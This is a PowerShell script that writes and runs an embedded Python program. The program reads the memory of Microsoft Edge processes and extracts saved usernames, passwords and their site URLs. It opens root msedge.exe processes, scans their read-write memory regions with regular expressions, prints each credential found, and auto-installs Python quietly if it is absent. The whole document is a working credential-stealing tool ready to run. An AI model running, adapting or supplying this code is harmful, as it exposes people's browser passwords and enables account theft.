$pythonCode = @' def main(): # 管理者権限チェックをスキップ print("\033[92m[v]\033[0m Starting script execution\n") print("Fetching browser processes:", end="", flush=True) total_matches = 0 shown_matches = 0 seen_strings = set() already_checked_users = set() process_list = [] # Get all msedge.exe processes for proc in psutil.process_iter(['pid', 'name', 'ppid']): try: if proc.info['name'] and proc.info['name'].lower() == 'msedge.exe': pid = proc.info['pid'] parent_pid = proc.info['ppid'] skip = False # Check what process is parent try: parent = psutil.Process(parent_pid) if parent.name().lower() == 'msedge.exe': skip = True # Parent is msedge.exe → skip this child process except (psutil.NoSuchProcess, psutil.AccessDenied): pass # Parent may have exited → treat as root process if skip: continue # The credentials are only stored at root/parent msedge.exe processes owner = get_process_owner_from_token(pid) process_list.append(ProcessInfo(pid, proc.info['name'], owner)) except (psutil.NoSuchProcess, psutil.AccessDenied): continue print(" Done.\n") for proc in process_list: user_process_key = f"{proc.Owner} {proc.Name}" if user_process_key in already_checked_users: continue owner = proc.Owner.replace("NSC\\t1_", "") print(f"Scanning process PID: {proc.Id}\tName: {proc.Name}\tOwner: {owner}") process_handle = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, proc.Id) if not process_handle: print(f"Failed to open process: {proc.Id} {proc.Name} {proc.Owner}") continue # 修正: アドレスを適切に初期化 address = ctypes.c_void_p(0) while True: mem_info = MEMORY_BASIC_INFORMATION() result = kernel32.VirtualQueryEx( process_handle, address, ctypes.byref(mem_info), ctypes.sizeof(MEMORY_BASIC_INFORMATION) ) if result == 0: break readable = (mem_info.State == MEM_COMMIT and mem_info.Protect == PAGE_READWRITE) if readable and mem_info.BaseAddress is not None: region_size = mem_info.RegionSize try: buffer = ctypes.create_string_buffer(region_size) except (OverflowError, MemoryError): # バッファが作成できない場合はスキップ address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize) continue bytes_read = ctypes.c_size_t(0) if kernel32.ReadProcessMemory( process_handle, mem_info.BaseAddress, buffer, region_size, ctypes.byref(bytes_read) ): try: utf8_data = buffer.raw[:bytes_read.value].decode('utf-8', errors='ignore') except Exception: try: utf8_data = buffer.raw[:bytes_read.value].decode('latin-1', errors='ignore') except Exception: utf8_data = "" if utf8_data: lines = re.split(r'\r\n|\r|\n', utf8_data) for line in lines: if len(line) < 1: # 短すぎる行はスキップ continue pattern = r'[a-zA-Z]https?\x20([a-zA-ZæøåÆØÅ0-9\\\-_.@\?]{3,20})\x20([a-zA-ZæøåÆØÅ0-9#!@#\$%\^&\*\(\)_\-\+=\{\}\[\]:;<>\?/~\s]{6,40})\x20\x00' try: matches = re.finditer(pattern, line) except Exception: continue for match in matches: try: username = match.group(1) password = match.group(2) potential_pattern = f"{username} : {password}" url_pattern = ( r'\x00\x00\x00' r'([A-Za-z0-9\-._~:/?#\[\]@!$&\'()*+,;=%]+)' r'(https?)' + re.escape(f'\x20{username} {password}') ) for url_match in re.finditer(url_pattern, line): value = url_match.group(1) combined = f"{potential_pattern} @{value}" if combined not in seen_strings: print(combined) seen_strings.add(combined) shown_matches += 1 total_matches += 1 already_checked_users.add(user_process_key) except Exception: continue # 修正: 次のメモリリージョンへ移動(BaseAddressとRegionSizeがNoneでないことを確認) if mem_info.BaseAddress is not None and mem_info.RegionSize is not None: address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize) else: break kernel32.CloseHandle(process_handle) seen_strings.clear() print(f"\nTotal matches found across all processes: {total_matches}. {shown_matches} shown.") '@ $pyFile = "wp.py" Set-Content -Path $pyFile -Value $pythonCode -Encoding UTF8 Write-Host "Saved: $pyFile" # ===== Pythonコマンド確認 ===== $pythonCmd = $null if (Get-Command python3 -ErrorAction SilentlyContinue) { $pythonCmd = "python3" } elseif (Get-Command python -ErrorAction SilentlyContinue) { $pythonCmd = "python" } # ===== Python未導入なら自動インストール ===== if (-not $pythonCmd) { Write-Host "Python not found. Downloading..." $installer = "$env:TEMP\python-installer.exe" Invoke-WebRequest ` -Uri "https://www.python.org/ftp/python/3.12.3/python-3.12.3-amd64.exe" ` -OutFile $installer Write-Host "Installing Python..." Start-Process ` -FilePath $installer ` -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1" ` -Wait # PATH再読み込み $env:Path = [System.Environment]::GetEnvironmentVariable( "Path", "Machine" ) + ";" + [System.Environment]::GetEnvironmentVariable( "Path", "User" ) # 再確認 if (Get-Command python3 -ErrorAction SilentlyContinue) { $pythonCmd = "python3" } elseif (Get-Command python -ErrorAction SilentlyContinue) { $pythonCmd = "python" } if (-not $pythonCmd) { Write-Error "Python installation failed." exit 1 } } # ===== 実行 ===== Write-Host "Running wp.py with $pythonCmd" & $pythonCmd $pyFile